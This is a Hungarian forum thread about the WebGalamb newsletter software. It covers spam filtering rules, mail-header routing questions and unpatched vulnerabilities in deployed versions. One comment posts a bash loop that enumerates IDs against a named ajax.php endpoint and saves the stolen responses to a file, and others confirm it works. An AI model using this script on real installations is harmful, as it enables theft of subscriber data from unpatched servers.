- A hozzászóláshoz be kell jelentkezni
Hozzászólások
en evek ota szurom a webgalambos leveleket, ugyis csak komolytalan cegek hasznaljak
- A hozzászóláshoz be kell jelentkezni
En azt sem tudtam, hogy letezik... :)
- A hozzászóláshoz be kell jelentkezni
a webgalamb az egy spamware. Legalabbis eddig csak spammerektol kaptam ilyen cuccal levelet...
--
O1G
- A hozzászóláshoz be kell jelentkezni
en is, azert szurom evek ota. talan 1x ha reklamalt valaki hogy nem kap meg valami fontosat, amit ezzel kuldtek...
- A hozzászóláshoz be kell jelentkezni
Ha már spamware. Pár hete kezdtem el olyan spameket kapni ami már elérte az ingerküszöbömet, hogy foglalkozzak vele. Belenézve a fejlécbe láttam, hogy az összes ilyen a freemailes címemre jön, az mx.onbox.hu-n keresztül. Gondoltam szűröm az összes mx.onbox.hu-n keresztül érkezőt oszt jónapot, de előtte rákerestem jött-e még más is onnan. Az eredmény az, hogy 2017.11 óta a freemail-es címemre érkező összes email az mx.onbox.hu-n keresztül jön. Vagyis pontosabban a Received mezőbe mx.onbox.hu név kerül. A telekom megvette az onboxot vagy én nézek be valamit?
$ host -tA fmx.freemail.hu
fmx.freemail.hu has address 84.2.43.65
$ host -tA mx.onbox.hu
mx.onbox.hu has address 84.2.43.65
Fejlécben:
Received: (qmail 6855 invoked by uid 31487); 5 Jan 2019 21:52:42 +0100
Received: (qmail 6845 invoked from network); 5 Jan 2019 21:52:42 +0100
Received: from unknown (HELO mx.onbox.hu) (10.6.145.225)
by 172.27.78.105 with SMTP; 5 Jan 2019 21:52:42 +0100
Received: from sender.tld (sender.tld [x.x.x.x])
by mx.onbox.hu (Postfix) with ESMTPS id 43XDPP4578z196C
for <xxxfreemail.hu> Sat, 5 Jan 2019 21:52:41 +0100 (CET)
- A hozzászóláshoz be kell jelentkezni
Röviden: ugyanaz a kettő.
Hosszabban: https://444.hu/2018/02/21/gyakorlatilag-senki-nem-hasznalja-az-origo-cs…
- A hozzászóláshoz be kell jelentkezni
az onbox a fizetos freemail.hu. A magentasok atjatszottak ezt is az origoval egyutt a new wave media kft-nek...
--
O1G
- A hozzászóláshoz be kell jelentkezni
Amikor Soros elindította a freemailt, meg orbánt az élet rögös útján, biztos nem gondolta volna, hogy 2018-ban ezek összetalálkoznak majd. :)
- A hozzászóláshoz be kell jelentkezni
hat ja...
--
O1G
- A hozzászóláshoz be kell jelentkezni
http://www.c3.hu/c3/sponsors/index-hu.html
(fiatalok kedvéért)
- A hozzászóláshoz be kell jelentkezni
Sose találkoztam még vele.
-----
„Egy jó kapcsolatban a társunkat az ő dolgában kell támogatni, nem a miénkben.”
rand() a lelke mindennek! :)
Szerinted…
- A hozzászóláshoz be kell jelentkezni
Szerencsés ember...
- A hozzászóláshoz be kell jelentkezni
+1
--
arch,ubuntu,windows,libreelec,omnirom,microg
zbook/elitebook/rpi3/motog4_athene
- A hozzászóláshoz be kell jelentkezni
A legszebb az egészben, hogy ők is a saját szoftverüket használják sales szerzésre... :P
- A hozzászóláshoz be kell jelentkezni
Zsír. Szerencsére nem kaptam semmit még innen.
Akkor mehet hozzá? :)
/webgalamb\.hu$/ REJECT 550 "Spammer domain!"
https://hup.hu/node/155731?comments_per_page=9999#comment-2294701
--
"Sose a gép a hülye."
- A hozzászóláshoz be kell jelentkezni
A webgalambot minden "vásárló" saját szerverre telepíti, így csak max. a fejlesztő cég domainjét zárod ki, ha jól értem a fentit.
- A hozzászóláshoz be kell jelentkezni
Így van, ennek így nem sok értelme.
Talán a header-be beteszi magát, az alapján azonosíthatod.
- A hozzászóláshoz be kell jelentkezni
Vicceltem amúgy. :)
De eddig tényleg elkerült ez a galamb.
--
"Sose a gép a hülye."
- A hozzászóláshoz be kell jelentkezni
Lehet hostolást is kérni (plusz pénzért).
- A hozzászóláshoz be kell jelentkezni
van már nekik hostolt megoldásuk is.
- A hozzászóláshoz be kell jelentkezni
Igen - a wgx.hu, ha minden igaz, ami szintén sebezhető volt. :D
- A hozzászóláshoz be kell jelentkezni
X-Mailer: Webgalamb
Szerencsére jó fejek, így nagyon régóta lehetett globál szűrni.
- A hozzászóláshoz be kell jelentkezni
vagy spamassassinbe:
header WEBGALAMB X-Mailer =~ /Webgalamb/i
describe WEBGALAMB Webgalamb email-marketing software signature
score WEBGALAMB 5
- A hozzászóláshoz be kell jelentkezni
wg4 esetén nem látom kapásból ezeket a hibákat, de csak futólag néztem rá egy installra... jó lenne hivatalos reakciót látni az érintett verziókról
egyébként gyönyörűek az obfuszkált php fileok, az egymásba ágyazott eval() miatt még biztonságosan se lehet üzemeltetni ezt a fost
- A hozzászóláshoz be kell jelentkezni
Pedig wg4 esetén is van, csak nem az a path, hanem victim.tld/webgalamb/wg4_moduls/ajax.php?...
- A hozzászóláshoz be kell jelentkezni
igen, de nálam egy kísérlet erejéig próbált csv upload legalábbis nem ment. ettől még persze lehet, hogy ott vannak a hibák, csak kicsit másképp kell kihasználni.
- A hozzászóláshoz be kell jelentkezni
#!/bin/bash
counter=1
while [ $counter -le 1000000 ]
do
curl -d "uidselect=&g=$counter" http://victim.tld/4/wg4_moduls/ajax.php?atment_sddd1xGz=1 >> stealed.txt
done
- A hozzászóláshoz be kell jelentkezni
nem kene novelni a szamlalot? :-)
--
O1G
- A hozzászóláshoz be kell jelentkezni
Hopp, az kimaradt a kopipasztából - egyébként de, kellene. :D
- A hozzászóláshoz be kell jelentkezni
true, ez müx
- A hozzászóláshoz be kell jelentkezni
Ezt írta a support:
"Kedves Gábor!
Aggodalomra semmi ok! :)
A legfrissebb 7-es verzióban ezek javítva lettek.
[...]
"
--
trey @ gépház
- A hozzászóláshoz be kell jelentkezni
Az lehet, de attól még az összes, kint levő telepítés (akár 7-es is) sebezhető maradt. :D
- A hozzászóláshoz be kell jelentkezni
Igen, ez ügyben most írtam nekik. Mármint, hogy a 7.x verzió letöltési linkjén csak röhögő gyerekfejet látok, frissítőcsomagot nem:
https://www.webgalamb.hu/frissites.php?version=7
--
trey @ gépház
- A hozzászóláshoz be kell jelentkezni
Ez mi? Komoly, vagy deface-elték az oldalukat is?
--
- A hozzászóláshoz be kell jelentkezni
Viccnek durva lenne...
- A hozzászóláshoz be kell jelentkezni
És aki nem frissített 7-re, az így járt?
- A hozzászóláshoz be kell jelentkezni
Még várom a választ :)
--
trey @ gépház
- A hozzászóláshoz be kell jelentkezni
Kijött a javítás: https://www.webgalamb.hu/frissites.php?version=7
De ez jó a 6 verzióhoz szerintetek? Én erről nem látok semmit... Mailre meg nem válaszoltak...
- A hozzászóláshoz be kell jelentkezni
Gondolom a legutolsó verziót kalapálták ki először. Én csinálnék egy upgrade-et a hetes verzióra, az a biztos...
- A hozzászóláshoz be kell jelentkezni
Tehát megvennéd az upgradet? Mert én biztos nem adnék nekik több pénzt. :D
- A hozzászóláshoz be kell jelentkezni
Ja, hogy a 6-ról a 7-re fizetős? Aaaaaaz igen... Akkor szépen el kell engedni a galambot, persze jó halkat, mert mint bölcs Salamon óta tudjuk, a hangosnak nincsen szaga... :-D :-D
Viccet félretéve nem venném meg, és a meglévőt is ki3.14csáznám a fenébe, mivel igen jelentős sérülékenségekkel bír, és javítás nincs.
- A hozzászóláshoz be kell jelentkezni
Igen ez a problémám nekem is... Az egyik licenszet ráadásul a 7 megjelenése előtt 1 nappal vettem (még hatos verzió...).
Nagyon gáz hibák, emiatt nem akarok fizetni. Ráadásul a kommunikáció is kritikán aluli.
- A hozzászóláshoz be kell jelentkezni
Akkor már bőven tudtak a sebezhetőségekről, szóval szerintem simán befigyel a hibás teljesítés.
- A hozzászóláshoz be kell jelentkezni
Most beszéltem velük, a mai nap folyamán (valószínűleg) jön a frissítés a 6 verzióhoz.
- A hozzászóláshoz be kell jelentkezni
Jaja :D
- A hozzászóláshoz be kell jelentkezni
Ennek a WebGalamb dolognak van köze a DrótPostaGalamb nevű - már elhalt - dologhoz? :)
- A hozzászóláshoz be kell jelentkezni
Szerintem semmi. A WebGalamb egy PHP-ban írt hírlevélküldő rendszer. Elég egyszerű használni, ezért olyan cégek, akik saját ügyfélkörüknek saját termékeikről szeretnének egyszerűen (titkárnő vagy marketinges által) hírleveleket küldeni, előszeretettel használják. Telepítése se túl bonyolult. Az üzemeltetése viszont odafigyelést igényel. Lásd: OP
A felülete elég fancy és nem is túl drága.
Nyilván lehet spammelésre is használni, de véleményem szerint aki ilyesmire (spam küldése) adja a fejét, annak sokkal jobb és költséghatékonyabb lehetőségei is lehetnek a zavarosban halászásra.
--
trey @ gépház
- A hozzászóláshoz be kell jelentkezni
Kijött a javítás a 6 verzióhoz:
https://www.webgalamb.hu/frissites.php?version=6
- A hozzászóláshoz be kell jelentkezni
"mindenképp frissítsd le"
Hogy lehet valamit LE frissíteni?
- A hozzászóláshoz be kell jelentkezni
ahogy letolni, leb@szni
- A hozzászóláshoz be kell jelentkezni
downgrade, upgrade :)
- A hozzászóláshoz be kell jelentkezni
Szövőgyárban kelmét szőnek.
-----
„Egy jó kapcsolatban a társunkat az ő dolgában kell támogatni, nem a miénkben.”
rand() a lelke mindennek! :)
Szerinted…
- A hozzászóláshoz be kell jelentkezni
Fent is lent, meg lent is lent.
De hol gyártják a szövőket?
- A hozzászóláshoz be kell jelentkezni